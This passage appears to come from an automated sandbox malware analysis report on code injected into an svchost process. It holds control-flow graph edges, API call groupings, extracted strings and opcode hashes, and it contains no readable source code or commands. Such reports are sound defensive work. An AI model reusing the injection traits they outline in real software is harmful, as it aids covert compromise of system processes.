2c06f7b6c2f-2c06f7b6c3d call 2c06f7c2758 389->397 398 2c06f7b6c25-2c06f7b6c2d 389->398 410 2c06f7b6cac-2c06f7b6cae 390->410 411 2c06f7b6c76-2c06f7b6c78 390->411 399 2c06f7b6c43-2c06f7b6c58 call 2c06f7b69f0 397->399 415 2c06f7b6cf5-2c06f7b6cfd 397->415 398->399 399->390 399->415 402->403 451 2c06f7b6abe-2c06f7b6ac5 __scrt_dllmain_after_initialize_c 402->451 403->370 422 2c06f7b6af3-2c06f7b6aff call 2c06f7b7260 403->422 412 2c06f7b6cb0-2c06f7b6cb3 410->412 413 2c06f7b6cb5-2c06f7b6cca call 2c06f7b69f0 410->413 411->410 419 2c06f7b6c7a-2c06f7b6c9c call 2c06f7b2858 call 2c06f7b6b58 411->419 412->413 412->415 413->415 431 2c06f7b6ccc-2c06f7b6cd6 413->431 415->396 419->410 446 2c06f7b6c9e-2c06f7b6ca6 call 2c06f7c2758 419->446 439 2c06f7b6b01-2c06f7b6b0b call 2c06f7b7178 422->439 440 2c06f7b6b25-2c06f7b6b30 422->440 436 2c06f7b6cd8-2c06f7b6cdf 431->436 437 2c06f7b6ce1-2c06f7b6cf1 call 2c06f7c2758 431->437 436->415 437->415 439->440 452 2c06f7b6b0d-2c06f7b6b1b 439->452 440->374 446->410 451->403 453 2c06f7b6ac7-2c06f7b6ae4 call 2c06f7b9078 451->453 452->440 453->403
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: a3d6534f1ed353e44835bda4d8e774e83f0dfb0052b4a37eda8d837624c94864
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 4B81C121600281CAFA50AFE69CCDF9DE2ACE747780F744065AB0453796DA3BCB668300

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 456 2c06fd475f0-2c06fd475f6 457 2c06fd47631-2c06fd4763b 456->457 458 2c06fd475f8-2c06fd475fb 456->458 461 2c06fd47758-2c06fd4776d 457->461 459 2c06fd47625-2c06fd47664 call 2c06fd47ca0 458->459 460 2c06fd475fd-2c06fd47600 458->460 476 2c06fd47732 459->476 477 2c06fd4766a-2c06fd4767f call 2c06fd47b34 459->477 462 2c06fd47602-2c06fd47605 460->462 463 2c06fd47618 __scrt_dllmain_crt_thread_attach 460->463 464 2c06fd4777c-2c06fd47796 call 2c06fd47b34 461->464 465 2c06fd4776f 461->465 468 2c06fd47607-2c06fd47610 462->468 469 2c06fd47611-2c06fd47616 call 2c06fd47be4 462->469 472 2c06fd4761d-2c06fd47624 463->472 479 2c06fd477cf-2c06fd47800 call 2c06fd47e70 464->479 480 2c06fd47798-2c06fd477cd call 2c06fd47c5c call 2c06fd47afc call 2c06fd47ff8 call 2c06fd47e10 call 2c06fd47e34 call 2c06fd47c8c 464->480 470 2c06fd47771-2c06fd4777b 465->470 469->472 481 2c06fd47734-2c06fd47749 476->481 488 2c06fd47685-2c06fd47696 call 2c06fd47ba4 477->488 489 2c06fd4774a-2c06fd47757 call 2c06fd47e70 477->489 490 2c06fd47811-2c06fd47817 479->490 491 2c06fd47802-2c06fd47808 479->491 480->470 509 2c06fd476e7-2c06fd476f1 call 2c06fd47e10 488->509 510 2c06fd47698-2c06fd476bc call 2c06fd47fbc call 2c06fd47aec call 2c06fd47b18 call 2c06fd49cdc 488->510 489->461 497 2c06fd4785e-2c06fd47874 call 2c06fd43458 490->497 498 2c06fd47819-2c06fd47823 490->498 491->490 496 2c06fd4780a-2c06fd4780c 491->496 505 2c06fd478ff-2c06fd4790c 496->505 517 2c06fd47876-2c06fd47878 497->517 518 2c06fd478ac-2c06fd478ae 497->518 499 2c06fd47825-2c06fd4782d 498->499 500 2c06fd4782f-2c06fd4783d call 2c06fd53358 498->500 506 2c06fd47843-2c06fd47858 call 2c06fd475f0 499->506 500->506 521 2c06fd478f5-2c06fd478fd 500->521 506->497 506->521 509->476 529 2c06fd476f3-2c06fd476ff call 2c06fd47e60 509->529 510->509 558 2c06fd476be-2c06fd476c5 __scrt_dllmain_after_initialize_c 510->558 517->518 526 2c06fd4787a-2c06fd4789c call 2c06fd43458 call 2c06fd47758 517->526 519 2c06fd478b5-2c06fd478ca call 2c06fd475f0 518->519 520 2c06fd478b0-2c06fd478b3 518->520 519->521 538 2c06fd478cc-2c06fd478d6 519->538 520->519 520->521 521->505 526->518 550 2c06fd4789e-2c06fd478a6 call 2c06fd53358 526->550 546 2c06fd47725-2c06fd47730 529->546 547 2c06fd47701-2c06fd4770b call 2c06fd47d78 529->547 543 2c06fd478e1-2c06fd478f1 call 2c06fd53358 538->543 544 2c06fd478d8-2c06fd478df 538->544 543->521 544->521 546->481 547->546 559 2c06fd4770d-2c06fd4771b 547->559 550->518 558->509 560 2c06fd476c7-2c06fd476e4 call 2c06fd49c78 558->560 559->546 560->509
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 96bae89d7dd669b3ec66a15d46cdea272c4d03b9eba937c73ddf59c4c3935570
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: D381F030B04341E6FF50AF69D8C9F9D26DFBB85780F784425AA0887796DB3BE8658710

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 2c06fd49804-2c06fd49842 564 2c06fd49933 563->564 565 2c06fd49848-2c06fd4984b 563->565 566 2c06fd49935-2c06fd49951 564->566 565->566 567 2c06fd49851 565->567 568 2c06fd49854 567->568 569 2c06fd4985a-2c06fd49869 568->569 570 2c06fd4992b 568->570 571 2c06fd49876-2c06fd49895 call 2c06fd53138 569->571 572 2c06fd4986b-2c06fd4986e 569->572 570->564 579 2c06fd49897-2c06fd498a0 call 2c06fd53080 571->579 580 2c06fd498ed-2c06fd49902 571->580 573 2c06fd49874 572->573 574 2c06fd4990d-2c06fd4991c GetProcAddress 572->574 576 2c06fd498e1-2c06fd498e8 573->576 574->570 577 2c06fd4991e-2c06fd49929 574->577 576->568 577->566 585 2c06fd498a2-2c06fd498b7 call 2c06fd4ad28 579->585 586 2c06fd498cf-2c06fd498d9 579->586 580->574 581 2c06fd49904-2c06fd49907 call 2c06fd530a8 580->581 581->574 585->586 589 2c06fd498b9-2c06fd498cd call 2c06fd53138 585->589 586->576 589->580 589->586
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: 54a0eb139fe5e5265618aecf017be00832ba99c92d2e56134daf7c743366adfe
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 8831C332202B50D1FE169F17E988F9D63DEBB08BA4F295525ED2D47388DF39E0658301
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: dc6b4728255849dd63e413ae0557b119ed5ab33808c75448e84feb0c89431e44
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: DB11C132314B40C6FB509F16E899B1DB3AAF398FE4F200224EA5D87794CF7AD9648740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 49c35667e0371822ec87b057df76f49bfb754ea8591b862669f28041412a3d7f
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: 79D1AA76208B88C2EE70DF19E49875E77E5F788B84F200116EA8D47BA5DF3AD551CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: b030431e6c28feafafe7ce1907f865213bc35bd2e0bc1291a2c748e83d4fde88
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 56319322701B51C2FF15DF1AE889B6D63EAFB44B84F1840209E4907B54EF3AE4B1CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: f5beae198df69654803035c8ee59978a31192614c9c59f2cac1c052defed054e
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: D3013521300A4196FE119F22E89DB5963AAE788BC0F688435CE8943754DE3AD9AA8700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: 3b80af9e24587d0d9d1899819f79b500b7dca79ad8011e6b59bae33b7fd60ac4
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: 71112D65611740C2FF259F25E48EB1EA7AABB58B85F240424CD4947754EF3ED428D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: a960c7c1bc8905fba12cc248bc61c653e8f0415e02c0a8b695fc3bba292e2b92
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: 93516832211600DBFF14DF26E5C8F5D37EAF384B88FA48120AA564778CDA36E861CB01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 30774f4dde6dee3c055a3ba5394038e7a39669da777cb732b3f861e9294aaa21
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: 31F04F22304641D2FF209F65F4DDB5E6766F744B88F949020CA4947A54DF3ED6ACCB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: 0d6570bc86338e536da71a5cb97cd5ab11df822838e4752137189de2ea94f407
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: AEF08220304B90D2FE008F57F98A62D626BAB48FD0F288131DE5A07B28CE3DD4A18300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: 8fa19de9e5d5395881d905420ee06ed50be22dda3cd3c50482652cd341a72cbd
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: 9AF08262311B40D1FF454F60E8DDB6D23ABAB48B80F242029950B46560CF39E4BCCB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 4d9aac5b05dc62947cac28c931583a5c4d47a1081e4c4a99eeb696082d87e7d2
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 2B02C736219B80C6EB60CF59E49875EB7A6F3C5784F204115EA8E87BA8DF7DD494CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: 987367d9887e58293ec015e7aba903c4eae8b5b32b9dd99c4623428e3c1d4658
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 1681D122610602C9FF50AFA4C8CCFAD2BABF794BD8F645115DE0A57795DB36A461C310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction ID: c5723c00159b153b82166e1aadd33ed305f997f2f7886f31a57f8807874e76ef
                                                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                • Instruction Fuzzy Hash: 8861B936519A40C6FB608F59E488B1EB7EAF388744F200115FA8D87BA8DB7ED460CF40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 5cb7954cfda182ab1e12fa401ada5d195f4b4b6dbbe45c473128de64ae4179e9
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 41112922A40E00CDF6641DE5E4DEF6D84486B56378F784239EA7607BD6CADA8F624100
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: b9727b9b282ca3ce9f8b4db0d914f0ed42e59b60d75f3dfa4141343f09d25bec
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 2C11A523A58A11C1FEA81D68E4DEB6D104B7B753B4F394724BA77073D6CB5AED624200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: 3693722a7f68b5cc6c5508534b4320f2c1af10b18381b107ce75eaa9adec4629
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: 5C115E20215640C2FE149F36E9CDF2D32DBAB887A0F344624D926077DDDA3AF8628711
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: d966254c15ad6f14c83360b069619a4203707f18a3e65372d1d926304c325cf8
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: AF113C2A704B40C3FF149F25F449B6EA6AAF748B84F240429DE8947794EF3ED518D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 7b2ad59eace2b2800732036f5c8b333508d53c99af71bd1e99aa5d38f85e7a52
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 6D51C03271A602CAFB14CF55E888F5CB39EF742B98F718124DA1647789EB36CA52C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: b0c9df37878c68bff69ae50c42f7d8455b5c17a70cdd7cdb95f10bb4bb14cc3a
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 28319171219642CAF714DF51E8C8F1DB7ACFB41B98F258014EE5A47745DB3ACA62C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 8278bb6681fc9713d3c2e2e62d9720184b284c2863ec9e88722e9a67c80bf700
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: EC112E32514B88D2FF559F66E888B1EB7B6F789B84F144029DB9A03B14DF39D061C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: d1dfec3b12b4639863af5b933c8899ca69104468bb26d5a4a36b2712b73ad839
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 4671E432214781C5FF249F29D9C8BAE67DAF744B89F640016DE8983B89DE36D624C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: c242f3625c2c74f7b2f663f9e3694b606898c7b24869dc695b286bfd18aa7ffb
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: E951EB32208781C2FE75AF2AD5DCB6E66DBF385784F240025CD8983B99CE37E4258B40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: 59e89f6b7cc1d4c31b428159443c4097e380627219464df22c95132e7175267f
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: A041A372314A41C2FB209F25E48879EB7AAF7887C4F604025EE4D87798DB3DD555CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd
                                                                                Similarity
